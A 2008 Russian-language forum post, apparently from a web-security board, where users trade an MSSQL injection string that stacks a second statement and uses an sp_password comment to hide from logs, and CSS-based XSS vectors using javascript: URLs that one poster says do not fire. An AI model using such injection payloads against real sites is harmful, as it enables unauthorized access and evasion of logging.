18.12.2008, 17:45
|
|
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903
Репутация:
238
|
|
Сообщение от [Raz0r]
попробуй так:
1';CREATE PROC test AS SELECT 1;--sp_password
@Mixon
attr:expression() работает только в IE
background-image: url(javascript:alert()) должно везде работать
http://ha.ckers.org/xss.html
Блииин,ну вот сделай html докуменд с содержанием <span style="color:#00FF00;background-image:url(javascript :alert());">ttt</span> и открой,ничего же не пашет!!!
|
|
|